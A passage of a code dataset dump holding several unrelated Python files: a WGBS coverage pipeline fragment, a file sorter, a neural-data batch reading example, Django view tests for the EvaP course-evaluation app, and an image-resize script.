outDirContextByGene=os.path.join(project_path, Names.STR_MCSTATISTICS_FOLDER_NAME, Names.STR_GET_COVERAGE_CONTEXT_BY_GENE)\n if not os.path.exists(outDirContextByGene):\n os.makedirs(outDirContextByGene)\n re_getCoverage_ContextByGene=mCStatistics.getCoverage_ContextByGene(covReport,refSeqBedFile,sampleName,outDirContextByGene,processNum=28)\n saveInterVar(re_getCoverage_ContextByGene,outDirContextByGene, 're_getCoverage_ContextByGene_'+sampleName)\n \ndef myGetCoverage_ContextByTransReturnIntersectDir(project_path, covReport, refRegionCGFile, regionBedDir, sampleName):\n outDirPicByTrans=os.path.join(project_path, Names.STR_CSTATISTICS_FOLDER_NAME, Names.STR_GET_COVERAGE_CONTEXT_BY_TRANS)\n if not os.path.exists(outDirPicByTrans):\n os.makedirs(outDirPicByTrans)\n re_getCoverage_ContextByTrans=CStatistics.getCoverage_ContextByTrans(covReport,refRegionCGFile,regionBedDir,sampleName,outDirPicByTrans,processNum=28)\n saveInterVar(re_getCoverage_ContextByTrans, outDirPicByTrans, 're_getCoverage_ContextByTrans_'+sampleName)\n return os.path.join(outDirPicByTrans, sampleName, Names.STR_INTERSECT_FOLDER_NAME)\n\n","sub_path":"WGBS_all_pipes/GetCoverage_ContextByGene_and_Trans.py","file_name":"GetCoverage_ContextByGene_and_Trans.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"238072787","text":"import shutil\nimport os\n\n\ndef main():\n os.chdir(\"FilesToSort\")\n print(\"working directory is \", os.getcwd())\n\n filenames = os.listdir(\".\")\n print(filenames)\n\n for filename in filenames:\n print(filename)\n file_type = filename[filename.find(\".\")+1:]\n print(file_type)\n try:\n os.mkdir(file_type) # makes directory only if one doesnt not already exist\n except FileExistsError:\n print(\"Already exists\")\n shutil.move(filename, file_type)\n\n# try:\n# print(\"make a new directory\")\n# os.mkdir('temp')\n# except FileExistsError:\n# print(\"File exists; pass\")\n\n\nmain()","sub_path":"Prac_09/sort_file.py","file_name":"sort_file.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"98578098","text":"import os\n\nfrom yass.batch import BatchProcessor\n\n\npath_to_neuropixel_data = (os.path.expanduser('~/data/ucl-neuropixel'\n '/rawDataSample.bin'))\n\n\nbp = BatchProcessor(path_to_neuropixel_data,\n dtype='int16', n_channels=385, data_format='wide',\n max_memory='1MB')\n\n# now, let's to some multi_channel operations, here we will traverse all\n# channels and all observations, each batch will contain a subset in the\n# temporal dimension, the window size is determined by max_memory\ndata = bp.multi_channel()\n\nfor d, _, idx in data:\n print('Shape: {}. Index: {}'.format(d.shape, idx))\n\n# we can specify the temporal limits and subset channels\ndata = bp.multi_channel(from_time=100000, to_time=200000, channels=[0, 1, 2])\n\nfor d, _, idx in data:\n print('Shape: {}. Index: {}'.format(d.shape, idx))\n\n\n# we can also create a BatchProcessor with a buffer\nbp2 = BatchProcessor(path_to_neuropixel_data,\n dtype='int16', n_channels=385, data_format='wide',\n max_memory='1KB', buffer_size=10)\n\ndata = bp2.multi_channel(from_time=0, to_time=100000, channels=[0, 1, 2])\n\nfor d, idx_local, idx in data:\n print('Shape: {}. Index (local): {}. Index: {}'.format(d.shape, idx_local,\n idx))\n","sub_path":"examples/batch/multi_channel.py","file_name":"multi_channel.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"162769788","text":"import datetime\nimport os\n\nfrom django.conf import settings\nfrom django.contrib.auth.models import Group\nfrom django.core import mail\nfrom django.urls import reverse\nfrom model_mommy import mommy\nimport xlrd\n\nfrom evap.evaluation.models import Semester, UserProfile, Course, CourseType, TextAnswer, Contribution, \\\n Questionnaire, Question, EmailTemplate, Degree\nfrom evap.evaluation.tests.tools import FuzzyInt, WebTest, ViewTest\n\n\nclass TestUserIndexView(ViewTest):\n url = '/staff/user/'\n test_users = ['staff']\n\n @classmethod\n def setUpTestData(cls):\n mommy.make(UserProfile, username='staff', groups=[Group.objects.get(name='Staff')])\n\n def test_num_queries_is_constant(self):\n \"\"\"\n ensures that the number of queries in the user list is constant\n and not linear to the number of users\n \"\"\"\n num_users = 50\n semester = mommy.make(Semester, is_archived=True)\n course = mommy.make(Course, state=\"published\", semester=semester, _participant_count=1, _voter_count=1) # this triggers more checks in UserProfile.can_staff_delete\n mommy.make(UserProfile, _quantity=num_users, courses_participating_in=[course])\n\n with self.assertNumQueries(FuzzyInt(0, num_users - 1)):\n self.app.get(self.url, user=\"staff\")\n\n\nclass TestUserBulkDeleteView(ViewTest):\n url = '/staff/user/bulk_delete'\n test_users = ['staff']\n filename = os.path.join(settings.BASE_DIR, \"staff/fixtures/test_user_bulk_delete_file.txt\")\n\n @classmethod\n def setUpTestData(cls):\n mommy.make(UserProfile, username='staff', groups=[Group.objects.get(name='Staff')])\n\n def test_testrun_deletes_no_users(self):\n page = self.app.get(self.url, user='staff')\n form = page.forms[\"user-bulk-delete-form\"]\n\n form[\"username_file\"] = (self.filename,)\n\n users_before = UserProfile.objects.count()\n\n reply = form.submit(name=\"operation\", value=\"test\")\n\n # Not getting redirected after.\n self.assertEqual(reply.status_code, 200)\n # No user got deleted.\n self.assertEqual(users_before, UserProfile.objects.count())\n\n def test_deletes_users(self):\n mommy.make(UserProfile, username='testuser1')\n mommy.make(UserProfile, username='testuser2')\n contribution = mommy.make(Contribution)\n mommy.make(UserProfile, username='contributor', contributions=[contribution])\n page = self.app.get(self.url, user='staff')\n form = page.forms[\"user-bulk-delete-form\"]\n\n form[\"username_file\"] = (self.filename,)\n\n self.assertEqual(UserProfile.objects.filter(username__in=['testuser1', 'testuser2', 'contributor']).count(), 3)\n user_count_before = UserProfile.objects.count()\n\n reply = form.submit(name=\"operation\", value=\"bulk_delete\")\n\n # Getting redirected after.\n self.assertEqual(reply.status_code, 302)\n\n # Assert only these two users got deleted.\n self.assertEqual(UserProfile.objects.filter(username__in=['testuser1', 'testuser2']).count(), 0)\n self.assertTrue(UserProfile.objects.filter(username='contributor').exists())\n self.assertEqual(UserProfile.objects.count(), user_count_before - 2)\n\n\nclass TestSemesterView(ViewTest):\n url = '/staff/semester/1'\n test_users = ['staff']\n\n @classmethod\n def setUpTestData(cls):\n mommy.make(UserProfile, username='staff', groups=[Group.objects.get(name='Staff')])\n cls.semester = mommy.make(Semester)\n cls.course1 = mommy.make(Course, name_de=\"A - Course 1\", name_en=\"B - Course 1\", semester=cls.semester)\n cls.course2 = mommy.make(Course, name_de=\"B - Course 2\", name_en=\"A - Course 2\", semester=cls.semester)\n mommy.make(Contribution, course=cls.course1, responsible=True, can_edit=True, comment_visibility=Contribution.ALL_COMMENTS)\n mommy.make(Contribution, course=cls.course2, responsible=True, can_edit=True, comment_visibility=Contribution.ALL_COMMENTS)\n\n def test_view_list_sorting(self):\n page = self.app.get(self.url, user='staff', extra_environ={'HTTP_ACCEPT_LANGUAGE': 'en'}).body.decode(\"utf-8\")\n position_course1 = page.find(\"Course 1\")\n position_course2 = page.find(\"Course 2\")\n self.assertGreater(position_course1, position_course2)\n\n page = self.app.get(self.url, user='staff', extra_environ={'HTTP_ACCEPT_LANGUAGE': 'de'}).body.decode(\"utf-8\")\n position_course1 = page.find(\"Course 1\")\n position_course2 = page.find(\"Course 2\")\n self.assertLess(position_course1, position_course2)\n\n\nclass TestSemesterExportView(ViewTest):\n url = '/staff/semester/1/export'\n test_users = ['staff']\n\n @classmethod\n def setUpTestData(cls):\n mommy.make(UserProfile, username='staff', groups=[Group.objects.get(name='Staff')])\n cls.semester = mommy.make(Semester)\n cls.course_type = mommy.make(CourseType)\n cls.course = mommy.make(Course, pk=1, type=cls.course_type, semester=cls.semester)\n\n def test_view_excel_file_sorted(self):\n course1 = mommy.make(Course, state='published', type=self.course_type,\n name_de='A - Course1', name_en='B - Course1', semester=self.semester)\n\n course2 = mommy.make(Course, state='published', type=self.course_type,\n name_de='B - Course2', name_en='A - Course2', semester=self.semester)\n\n mommy.make(Contribution, course=course1, responsible=True, can_edit=True, comment_visibility=Contribution.ALL_COMMENTS)\n mommy.make(Contribution, course=course2, responsible=True, can_edit=True, comment_visibility=Contribution.ALL_COMMENTS)\n\n page = self.app.get(self.url, user='staff')\n form = page.forms[\"semester-export-form\"]\n form.set('form-0-selected_course_types', 'id_form-0-selected_course_types_0')\n form.set('include_not_enough_answers', 'on')\n\n response_de = form.submit(extra_environ={'HTTP_ACCEPT_LANGUAGE': 'de'})\n response_en = form.submit(extra_environ={'HTTP_ACCEPT_LANGUAGE': 'en'})\n\n # Load responses as Excel files and check for correct sorting\n workbook = xlrd.open_workbook(file_contents=response_de.content)\n self.assertEqual(workbook.sheets()[0].row_values(0)[1], \"A - Course1\")\n self.assertEqual(workbook.sheets()[0].row_values(0)[3], \"B - Course2\")\n\n workbook = xlrd.open_workbook(file_contents=response_en.content)\n self.assertEqual(workbook.sheets()[0].row_values(0)[1], \"A - Course2\")\n self.assertEqual(workbook.sheets()[0].row_values(0)[3], \"B - Course1\")\n\n def test_view_downloads_excel_file(self):\n page = self.app.get(self.url, user='staff')\n form = page.forms[\"semester-export-form\"]\n\n # Check one course type.\n form.set('form-0-selected_course_types', 'id_form-0-selected_course_types_0')\n\n response = form.submit()\n\n # Load response as Excel file and check its heading for correctness.\n workbook = xlrd.open_workbook(file_contents=response.content)\n self.assertEqual(workbook.sheets()[0].row_values(0)[0],\n 'Evaluation {0}\\n\\n{1}'.format(self.semester.name, \", \".join([self.course_type.name])))\n\n\nclass TestSemesterCourseImportParticipantsView(ViewTest):\n url = \"/staff/semester/1/course/1/participant_import\"\n test_users = [\"staff\"]\n filename_valid = os.path.join(settings.BASE_DIR, \"staff/fixtures/valid_user_import.xls\")\n filename_invalid = os.path.join(settings.BASE_DIR, \"staff/fixtures/invalid_user_import.xls\")\n\n @classmethod\n def setUpTestData(cls):\n semester = mommy.make(Semester, pk=1)\n mommy.make(UserProfile, username=\"staff\", groups=[Group.objects.get(name=\"Staff\")])\n cls.course = mommy.make(Course, pk=1, semester=semester)\n\n def test_import_valid_file(self):\n page = self.app.get(self.url, user='staff')\n\n original_participant_count = self.course.participants.count()\n\n form = page.forms[\"participant-import-form\"]\n form[\"excel_file\"] = (self.filename_valid,)\n form.submit(name=\"operation\", value=\"import\")\n\n self.assertEqual(self.course.participants.count(), original_participant_count + 2)\n\n def test_import_invalid_file(self):\n page = self.app.get(self.url, user='staff')\n\n original_user_count = UserProfile.objects.count()\n\n form = page.forms[\"participant-import-form\"]\n form[\"excel_file\"] = (self.filename_invalid,)\n\n reply = form.submit(name=\"operation\", value=\"import\")\n\n self.assertContains(reply, 'Sheet "Sheet1", row 2: Email address is missing.')\n self.assertContains(reply, 'Errors occurred while parsing the input data. No data was imported.')\n\n self.assertEqual(UserProfile.objects.count(), original_user_count)\n\n def test_test_run(self):\n page = self.app.get(self.url, user='staff')\n\n original_participant_count = self.course.participants.count()\n\n form = page.forms[\"participant-import-form\"]\n form[\"excel_file\"] = (self.filename_valid,)\n form.submit(name=\"operation\", value=\"test\")\n\n self.assertEqual(self.course.participants.count(), original_participant_count)\n\n def test_suspicious_operation(self):\n page = self.app.get(self.url, user='staff')\n\n form = page.forms[\"participant-import-form\"]\n form[\"excel_file\"] = (self.filename_valid,)\n\n # Should throw SuspiciousOperation Exception.\n reply = form.submit(name=\"operation\", value=\"hackit\", expect_errors=True)\n\n self.assertEqual(reply.status_code, 400)\n\n\nclass TestCourseCommentsUpdatePublishView(WebTest):\n url = reverse(\"staff:course_comments_update_publish\")\n csrf_checks = False\n\n @classmethod\n def setUpTestData(cls):\n mommy.make(UserProfile, username=\"staff.user\", groups=[Group.objects.get(name=\"Staff\")])\n mommy.make(Course, pk=1)\n\n def helper(self, old_state, expected_new_state, action):\n textanswer = mommy.make(TextAnswer, state=old_state)\n response = self.app.post(self.url, {\"id\": textanswer.id, \"action\": action, \"course_id\": 1}, user=\"staff.user\")\n self.assertEqual(response.status_code, 200)\n textanswer.refresh_from_db()\n self.assertEqual(textanswer.state, expected_new_state)\n\n def test_review_actions(self):\n self.helper(TextAnswer.NOT_REVIEWED, TextAnswer.PUBLISHED, \"publish\")\n self.helper(TextAnswer.NOT_REVIEWED, TextAnswer.HIDDEN, \"hide\")\n self.helper(TextAnswer.NOT_REVIEWED, TextAnswer.PRIVATE, \"make_private\")\n self.helper(TextAnswer.PUBLISHED, TextAnswer.NOT_REVIEWED, \"unreview\")\n\n\nclass ArchivingTests(WebTest):\n\n def test_raise_403(self):\n \"\"\"\n Tests whether inaccessible views on archived semesters/courses correctly raise a 403.\n \"\"\"\n semester = mommy.make(Semester, is_archived=True)\n\n semester_url = \"/staff/semester/{}/\".format(semester.pk)\n\n self.get_assert_403(semester_url + \"import\", \"evap\")\n self.get_assert_403(semester_url + \"assign\", \"evap\")\n self.get_assert_403(semester_url + \"course/create\", \"evap\")\n self.get_assert_403(semester_url + \"courseoperation\", \"evap\")\n\n\nclass TestQuestionnaireNewVersionView(ViewTest):\n url = '/staff/questionnaire/2/new_version'\n test_users = ['staff']\n\n @classmethod\n def setUpTestData(cls):\n cls.name_de_orig = 'kurzer name'\n cls.name_en_orig = 'short name'\n questionnaire = mommy.make(Questionnaire, id=2, name_de=cls.name_de_orig, name_en=cls.name_en_orig)\n mommy.make(Question, questionnaire=questionnaire)\n mommy.make(UserProfile, username=\"staff\", groups=[Group.objects.get(name=\"Staff\")])\n\n def test_changes_old_title(self):\n page = self.app.get(url=self.url, user='staff')\n form = page.forms['questionnaire-form']\n\n form.submit()\n\n timestamp = datetime.date.today()\n new_name_de = '{} (until {})'.format(self.name_de_orig, str(timestamp))\n new_name_en = '{} (until {})'.format(self.name_en_orig, str(timestamp))\n\n self.assertTrue(Questionnaire.objects.filter(name_de=self.name_de_orig, name_en=self.name_en_orig).exists())\n self.assertTrue(Questionnaire.objects.filter(name_de=new_name_de, name_en=new_name_en).exists())\n\n def test_no_second_update(self):\n\n # First save.\n page = self.app.get(url=self.url, user='staff')\n form = page.forms['questionnaire-form']\n form.submit()\n\n # Second try.\n new_questionnaire = Questionnaire.objects.get(name_de=self.name_de_orig)\n page = self.app.get(url='/staff/questionnaire/{}/new_version'.format(new_questionnaire.id), user='staff')\n\n # We should get redirected back to the questionnaire index.\n self.assertEqual(page.status_code, 302) # REDIRECT\n self.assertEqual(page.location, '/staff/questionnaire/')\n\n\nclass TestSemesterRawDataExportView(ViewTest):\n url = '/staff/semester/1/raw_export'\n test_users = ['staff']\n\n @classmethod\n def setUpTestData(cls):\n mommy.make(UserProfile, username='staff', groups=[Group.objects.get(name='Staff')])\n cls.student_user = mommy.make(UserProfile, username='student')\n cls.semester = mommy.make(Semester)\n cls.course_type = mommy.make(CourseType, name_en=\"Type\")\n cls.course1 = mommy.make(Course, type=cls.course_type, semester=cls.semester, participants=[cls.student_user],\n voters=[cls.student_user], name_de=\"Veranstaltung 1\", name_en=\"Course 1\")\n cls.course2 = mommy.make(Course, type=cls.course_type, semester=cls.semester, participants=[cls.student_user],\n name_de=\"Veranstaltung 2\", name_en=\"Course 2\")\n mommy.make(Contribution, course=cls.course1, responsible=True, can_edit=True, comment_visibility=Contribution.ALL_COMMENTS)\n mommy.make(Contribution, course=cls.course2, responsible=True, can_edit=True, comment_visibility=Contribution.ALL_COMMENTS)\n\n def test_view_downloads_csv_file(self):\n response = self.app.get(self.url, user='staff')\n expected_content = (\n \"Name;Degrees;Type;Single result;State;#Voters;#Participants;#Comments;Average grade\\r\\n\"\n \"Course 1;;Type;False;new;1;1;0;\\r\\n\"\n \"Course 2;;Type;False;new;0;1;0;\\r\\n\"\n )\n self.assertEqual(response.content, expected_content.encode(\"utf-8\"))\n\n\nclass TestSemesterParticipationDataExportView(ViewTest):\n url = '/staff/semester/1/participation_export'\n test_users = ['staff']\n\n @classmethod\n def setUpTestData(cls):\n mommy.make(UserProfile, username='staff', groups=[Group.objects.get(name='Staff')])\n cls.student_user = mommy.make(UserProfile, username='student')\n cls.semester = mommy.make(Semester)\n cls.course_type = mommy.make(CourseType, name_en=\"Type\")\n cls.course1 = mommy.make(Course, type=cls.course_type, semester=cls.semester, participants=[cls.student_user],\n voters=[cls.student_user], name_de=\"Veranstaltung 1\", name_en=\"Course 1\", is_required_for_reward=True)\n cls.course2 = mommy.make(Course, type=cls.course_type, semester=cls.semester, participants=[cls.student_user],\n name_de=\"Veranstaltung 2\", name_en=\"Course 2\", is_required_for_reward=False)\n mommy.make(Contribution, course=cls.course1, responsible=True, can_edit=True, comment_visibility=Contribution.ALL_COMMENTS)\n mommy.make(Contribution, course=cls.course2, responsible=True, can_edit=True, comment_visibility=Contribution.ALL_COMMENTS)\n\n def test_view_downloads_csv_file(self):\n response = self.app.get(self.url, user='staff')\n expected_content = (\n \"Username;Can use reward points;#Required courses voted for;#Required courses;#Optional courses voted for;\"\n \"#Optional courses;Earned reward points\\r\\n\"\n \"student;False;1;1;0;1;False\\r\\n\")\n self.assertEqual(response.content, expected_content.encode(\"utf-8\"))\n\n\nclass TestSemesterDeleteView(ViewTest):\n url = '/staff/semester/delete'\n csrf_checks = False\n\n @classmethod\n def setUpTestData(cls):\n mommy.make(UserProfile, username='staff', groups=[Group.objects.get(name='Staff')])\n\n def test_failure(self):\n semester = mommy.make(Semester, pk=1)\n mommy.make(Course, semester=semester, state='in_evaluation', voters=[mommy.make(UserProfile)])\n self.assertFalse(semester.can_staff_delete)\n response = self.app.post(self.url, {'semester_id': 1}, user='staff', expect_errors=True)\n self.assertEqual(response.status_code, 400)\n self.assertTrue(Semester.objects.filter(pk=1).exists())\n\n def test_success(self):\n semester = mommy.make(Semester, pk=1)\n self.assertTrue(semester.can_staff_delete)\n response = self.app.post(self.url, {'semester_id': 1}, user='staff')\n self.assertEqual(response.status_code, 200)\n self.assertFalse(Semester.objects.filter(pk=1).exists())\n\n\nclass TestCourseCreateView(ViewTest):\n url = '/staff/semester/1/course/create'\n test_users = ['staff']\n\n @classmethod\n def setUpTestData(cls):\n cls.staff_user = mommy.make(UserProfile, username='staff', groups=[Group.objects.get(name='Staff')])\n mommy.make(Semester, pk=1)\n mommy.make(CourseType)\n mommy.make(Questionnaire, pk=1, is_for_contributors=False)\n mommy.make(Questionnaire, pk=2, is_for_contributors=True)\n\n def test_course_create(self):\n \"\"\"\n Tests the course creation view with one valid and one invalid input dataset.\n \"\"\"\n response = self.get_assert_200(\"/staff/semester/1/course/create\", \"staff\")\n form = response.forms[\"course-form\"]\n form[\"name_de\"] = \"lfo9e7bmxp1xi\"\n form[\"name_en\"] = \"asdf\"\n form[\"type\"] = 1\n form[\"degrees\"] = [\"1\"]\n form[\"vote_start_date\"] = \"02/1/2099\"\n form[\"vote_end_date\"] = \"02/1/2014\" # wrong order to get the validation error\n form[\"general_questions\"] = [\"1\"]\n\n form['contributions-TOTAL_FORMS'] = 1\n form['contributions-INITIAL_FORMS'] = 0\n form['contributions-MAX_NUM_FORMS'] = 5\n form['contributions-0-course'] = ''\n form['contributions-0-contributor'] = self.staff_user.pk\n form['contributions-0-questionnaires'] = [2]\n form['contributions-0-order'] = 0\n form['contributions-0-responsibility'] = \"RESPONSIBLE\"\n form['contributions-0-comment_visibility'] = \"ALL\"\n\n form.submit()\n self.assertFalse(Course.objects.exists())\n\n form[\"vote_start_date\"] = \"02/1/2014\"\n form[\"vote_end_date\"] = \"02/1/2099\" # now do it right\n\n form.submit()\n self.assertEqual(Course.objects.get().name_de, \"lfo9e7bmxp1xi\")\n\n\nclass TestSingleResultCreateView(ViewTest):\n url = '/staff/semester/1/singleresult/create'\n test_users = ['staff']\n\n @classmethod\n def setUpTestData(cls):\n cls.staff_user = mommy.make(UserProfile, username='staff', groups=[Group.objects.get(name='Staff')])\n mommy.make(Semester, pk=1)\n mommy.make(CourseType)\n\n def test_single_result_create(self):\n \"\"\"\n Tests the single result creation view with one valid and one invalid input dataset.\n \"\"\"\n response = self.get_assert_200(self.url, \"staff\")\n form = response.forms[\"single-result-form\"]\n form[\"name_de\"] = \"qwertz\"\n form[\"name_en\"] = \"qwertz\"\n form[\"type\"] = 1\n form[\"degrees\"] = [\"1\"]\n form[\"event_date\"] = \"02/1/2014\"\n form[\"answer_1\"] = 6\n form[\"answer_3\"] = 2\n # missing responsible to get a validation error\n\n form.submit()\n self.assertFalse(Course.objects.exists())\n\n form[\"responsible\"] = self.staff_user.pk # now do it right\n\n form.submit()\n self.assertEqual(Course.objects.get().name_de, \"qwertz\")\n\n\nclass TestCourseEmailView(ViewTest):\n url = '/staff/semester/1/course/1/email'\n test_users = ['staff']\n\n @classmethod\n def setUpTestData(cls):\n mommy.make(UserProfile, username='staff', groups=[Group.objects.get(name='Staff')])\n semester = mommy.make(Semester, pk=1)\n participant1 = mommy.make(UserProfile, email=\"foo@example.com\")\n participant2 = mommy.make(UserProfile, email=\"bar@example.com\")\n mommy.make(Course, pk=1, semester=semester, participants=[participant1, participant2])\n\n def test_emails_are_sent(self):\n page = self.get_assert_200(self.url, user=\"staff\")\n form = page.forms[\"course-email-form\"]\n form.get(\"recipients\", index=0).checked = True # send to all participants\n form[\"subject\"] = \"asdf\"\n form[\"body\"] = \"asdf\"\n form.submit()\n\n self.assertEqual(len(mail.outbox), 2)\n\n\nclass TestQuestionnaireDeletionView(WebTest):\n url = \"/staff/questionnaire/delete\"\n csrf_checks = False\n\n @classmethod\n def setUpTestData(cls):\n mommy.make(UserProfile, username='staff', groups=[Group.objects.get(name='Staff')])\n questionnaire1 = mommy.make(Questionnaire, pk=1)\n mommy.make(Questionnaire, pk=2)\n mommy.make(Contribution, questionnaires=[questionnaire1])\n\n def test_questionnaire_deletion(self):\n \"\"\"\n Tries to delete two questionnaires via the respective post request,\n only the second attempt should succeed.\n \"\"\"\n self.assertFalse(Questionnaire.objects.get(pk=1).can_staff_delete)\n response = self.app.post(\"/staff/questionnaire/delete\", {\"questionnaire_id\": 1}, user=\"staff\", expect_errors=True)\n self.assertEqual(response.status_code, 400)\n self.assertTrue(Questionnaire.objects.filter(pk=1).exists())\n\n self.assertTrue(Questionnaire.objects.get(pk=2).can_staff_delete)\n response = self.app.post(\"/staff/questionnaire/delete\", {\"questionnaire_id\": 2}, user=\"staff\")\n self.assertEqual(response.status_code, 200)\n self.assertFalse(Questionnaire.objects.filter(pk=2).exists())\n\n\nclass TestUserCreateView(ViewTest):\n url = \"/staff/user/create\"\n test_users = ['staff']\n\n @classmethod\n def setUpTestData(cls):\n mommy.make(UserProfile, username='staff', groups=[Group.objects.get(name='Staff')])\n\n def test_user_is_created(self):\n page = self.get_assert_200(self.url, \"staff\")\n form = page.forms[\"user-form\"]\n form[\"username\"] = \"mflkd862xmnbo5\"\n form[\"first_name\"] = \"asd\"\n form[\"last_name\"] = \"asd\"\n form[\"email\"] = \"a@b.de\"\n\n form.submit()\n\n self.assertEqual(UserProfile.objects.order_by(\"pk\").last().username, \"mflkd862xmnbo5\")\n\n\nclass TestTemplateEditView(ViewTest):\n url = \"/staff/template/1\"\n test_users = ['staff']\n\n @classmethod\n def setUpTestData(cls):\n mommy.make(UserProfile, username='staff', groups=[Group.objects.get(name='Staff')])\n\n def test_emailtemplate(self):\n \"\"\"\n Tests the emailtemplate view with one valid and one invalid input datasets.\n \"\"\"\n page = self.get_assert_200(self.url, \"staff\")\n form = page.forms[\"template-form\"]\n form[\"subject\"] = \"subject: mflkd862xmnbo5\"\n form[\"body\"] = \"body: mflkd862xmnbo5\"\n form.submit()\n\n self.assertEqual(EmailTemplate.objects.get(pk=1).body, \"body: mflkd862xmnbo5\")\n\n form[\"body\"] = \" invalid tag: {{}}\"\n form.submit()\n self.assertEqual(EmailTemplate.objects.get(pk=1).body, \"body: mflkd862xmnbo5\")\n\n\nclass TestCourseTypeView(ViewTest):\n url = \"/staff/course_types/\"\n test_users = ['staff']\n\n @classmethod\n def setUpTestData(cls):\n mommy.make(UserProfile, username='staff', groups=[Group.objects.get(name='Staff')])\n\n def test_page_displays_something(self):\n CourseType.objects.create(name_de='uZJcsl0rNc', name_en='uZJcsl0rNc')\n page = self.get_assert_200(self.url, user=\"staff\")\n self.assertIn('uZJcsl0rNc', page)\n\n def test_course_type_form(self):\n \"\"\"\n Adds a course type via the staff form and verifies that the type was created in the db.\n \"\"\"\n page = self.get_assert_200(self.url, user=\"staff\")\n form = page.forms[\"course-type-form\"]\n last_form_id = int(form[\"form-TOTAL_FORMS\"].value) - 1\n form[\"form-\" + str(last_form_id) + \"-name_de\"].value = \"Test\"\n form[\"form-\" + str(last_form_id) + \"-name_en\"].value = \"Test\"\n response = form.submit()\n self.assertIn(\"Successfully\", str(response))\n\n self.assertTrue(CourseType.objects.filter(name_de=\"Test\", name_en=\"Test\").exists())\n\n\nclass TestCourseTypeMergeView(ViewTest):\n url = \"/staff/course_types/1/merge/2\"\n test_users = ['staff']\n\n @classmethod\n def setUpTestData(cls):\n mommy.make(UserProfile, username='staff', groups=[Group.objects.get(name='Staff')])\n cls.main_type = mommy.make(CourseType, pk=1, name_en=\"A course type\")\n cls.other_type = mommy.make(CourseType, pk=2, name_en=\"Obsolete course type\")\n mommy.make(Course, type=cls.main_type)\n mommy.make(Course, type=cls.other_type)\n\n def test_merge_works(self):\n page = self.get_assert_200(self.url, user=\"staff\")\n form = page.forms[\"course-type-merge-form\"]\n response = form.submit()\n self.assertIn(\"Successfully\", str(response))\n\n self.assertFalse(CourseType.objects.filter(name_en=\"Obsolete course type\").exists())\n self.assertEqual(Course.objects.filter(type=self.main_type).count(), 2)\n for course in Course.objects.all():\n self.assertTrue(course.type == self.main_type)\n\n\nclass TestDegreeView(ViewTest):\n url = \"/staff/degrees/\"\n test_users = ['staff']\n\n @classmethod\n def setUpTestData(cls):\n mommy.make(UserProfile, username='staff', groups=[Group.objects.get(name='Staff')])\n\n def test_degree_form(self):\n \"\"\"\n Adds a degree via the staff form and verifies that the degree was created in the db.\n \"\"\"\n page = self.get_assert_200(self.url, user=\"staff\")\n form = page.forms[\"degree-form\"]\n last_form_id = int(form[\"form-TOTAL_FORMS\"].value) - 1\n form[\"form-\" + str(last_form_id) + \"-name_de\"].value = \"Test\"\n form[\"form-\" + str(last_form_id) + \"-name_en\"].value = \"Test\"\n response = form.submit()\n self.assertIn(\"Successfully\", str(response))\n\n self.assertTrue(Degree.objects.filter(name_de=\"Test\", name_en=\"Test\").exists())\n","sub_path":"evap/staff/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":26581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"607127450","text":"from PIL import Image\n\ndef resize_and_save(filename, size):\n im = Image.open(filename)\n new_im = im.resize(size)\n\n name_parts = filename.split(\".\")\n new_im.save(name_parts[0] + \"_resized.\" + name_parts[1])\n\nprint (\"How would yo liek to resize?\")\nprint (\"1) Fixed size (512x512)\")\nprint (\"2) Change to a percent\")\nprint (\"3) User input size\")\nprint (\"4) Set longest edge\")\nchoice = input (\"Enter one of the choice listed above: \")\nif (choice == \"1\"):\n resize_and_save(\"pikachu.jpg\", (512,512))\n\nelif (choice == \"2\"):\n filename = input(\"Enter a filename: \")\n im = Image.open(filename)\n old_size = im.size\n percent = input(\"Enter percent to scale to: \")\n scale = int(percent)/100.0\n new_width = int(old_size[0]*scale)\n new_height = int(old_size[1]*scale)\n new_size = (new_width, new_height)\n resize_and_save(filename, new_size)\n\nelif (choice == \"3\"):\n width = int(input (\"Enter width (pixels): \"))\n length = int(input (\"Enter length (pixels): \"))\n filename = str(input (\"Enter image filename: \"))\n size = (width, length)\n im = Image.open(filename)\n new_im = im.resize(size)\n name_parts = filename.split(\".\")\n new_im.save(name_parts[0] + \"_resized.\" + name_parts[1])\n\nelif (choice == \"4\"):\n valid = (False)\n filename = input (\"Enter image filename: \")\n im = Image.open(filename)\n old_size = im.size\n largest_side = max(im.size)\n shortest_side = min(im.size)\n while True:\n target = input(\"Enter desired pixel count of one side: \")\n try:\n val = int(target)\n if val < 0: # if not a positive int print message and ask for input again\n print(\"Sorry, input must be a positive integer, try again\")\n break\n except ValueError:\n print(\"That's not an int!\")\n ratio = (float(target)/largest_side)\n new_height = int(largest_side * ratio)\n new_width = int(shortest_side * ratio)\n new_size = (new_width, new_height)\n resize_and_save(filename, new_size)\n","sub_path":"resize.py","file_name":"resize.py","file_ext":"py","file_size_in_byte":2017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"292771233","text":"#\r\n# @lc app=leetcode id=74 lang=python3\r\n#\r\n# [74] Search a 2D Matrix\r\n#\r\n# https://leetcode.com/problems/search-a-2d-matrix/description/\r\n#\r\n# algorithms\r\n# Medium (35.11%)\r\n# Likes: 964\r\n# Dislikes: 114\r\n# Total Accepted: 242.4K\r\n# Total Submissions: 689.7K\r\n# Testcase Example: '[[1,3,5,7],[10,11,16,20],[23,30,34,50]]\\n3'\r\n#\r\n# Write an efficient algorithm that searches for a value in an m x n matrix.\r\n# This matrix has the following properties:\r\n#\r\n#\r\n# Integers in each row are sorted from left to right.\r\n# The first integer of each row is greater than the last integer of the\r\n# previous row.\r\n#\r\n#\r\n# Example 1:\r\n#\r\n#\r\n# Input:\r\n# matrix = [\r\n# ⁠ [1, 3, 5, 7],\r\n# ⁠ [10, 11, 16, 20],\r\n# ⁠ [23, 30, 34, 50]\r\n# ]\r\n# target = 3\r\n# Output: true\r\n#\r\n#\r\n# Example 2:\r\n#\r\n#\r\n# Input:\r\n# matrix = [\r\n# ⁠ [1, 3, 5, 7],\r\n# ⁠ [10, 11, 16, 